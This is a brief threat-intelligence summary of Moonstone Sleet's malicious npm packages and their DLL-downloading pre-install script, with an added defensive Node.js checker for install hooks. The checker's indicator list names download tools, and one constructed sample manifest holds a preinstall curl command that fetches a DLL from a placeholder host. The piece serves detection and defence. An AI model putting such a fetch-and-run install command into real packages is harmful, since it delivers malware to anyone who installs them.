A North Korea-linked threat actor, known as Moonstone Sleet and tracked as Stressed Pungsan, has been distributing malicious npm packages targeting Windows systems [1] [2].

Description

The packages, harthat-api and harthat-hash, were published on July 7, 2024, but were quickly removed after not attracting any downloads [1]. Moonstone Sleet has been spreading these packages through the npm registry, with a pre-install script downloading a rogue DLL file from an external server [1]. This activity aligns with warnings from South Korea’s National Cyber Security Center about cyber attacks by North Korean threat groups Andariel and Kimsuky, targeting the construction and machinery sectors with malware such as Dora RAT and TrollAgent [1].
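
The delivery path described above relies on an install-time lifecycle script that fetches a binary from an external server. As an added example (not code from the cited reports or from the packages themselves), this Node.js check flags such scripts in a package manifest before installation; the indicator list, the sample manifests and the `example.invalid` host are constructed for illustration.

```javascript
// Hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators (assumptions for this example, not a complete list).
const INDICATORS = [
  { name: "remote-url", re: /\bhttps?:\/\/[^\s"']+/i },
  { name: "download-tool", re: /\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest)\b/i },
  { name: "native-binary", re: /\.(dll|exe)\b/i },
];

// Return one finding per install-time hook declared in a parsed package.json.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue; // hook not declared
    const hits = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.name);
    findings.push({
      package: manifest.name || "(unnamed)",
      hook,
      command: cmd,
      indicators: hits,
      // Two or more indicators together (e.g. URL + binary) warrant blocking.
      severity: hits.length >= 2 ? "high" : hits.length === 1 ? "review" : "info",
    });
  }
  return findings;
}

function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (not taken from any real package).
const SAMPLES = [
  { name: "sample-benign", scripts: { test: "node test.js", postinstall: "node scripts/build.js" } },
  { name: "sample-suspicious", scripts: { preinstall: "curl -o helper.dll https://files.example.invalid/helper.dll" } },
  { name: "sample-no-scripts", version: "2.3.4" },
];

for (const f of auditAll(SAMPLES)) {
  console.log(`${f.severity.padEnd(6)} ${f.package} ${f.hook}: ${f.command} [${f.indicators.join(",")}]`);
}
```

Running installs with `npm install --ignore-scripts` prevents these hooks from executing at all, which leaves time to review any findings first.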

Conclusion

This incident highlights the ongoing threat posed by North Korean threat actors and the importance of vigilance in protecting against cyber attacks. Organizations in the construction and machinery sectors should be particularly cautious and ensure that their systems are secure against known malware such as Dora RAT and TrollAgent. Collaboration between international cybersecurity agencies is crucial in mitigating the risks posed by such malicious activities in the future.

References

[1] https://thehackernews.com/2024/08/north-korean-hackers-moonstone-sleet.html
[2] https://cybersecuritynews.com/north-korean-npm-attacks-windows/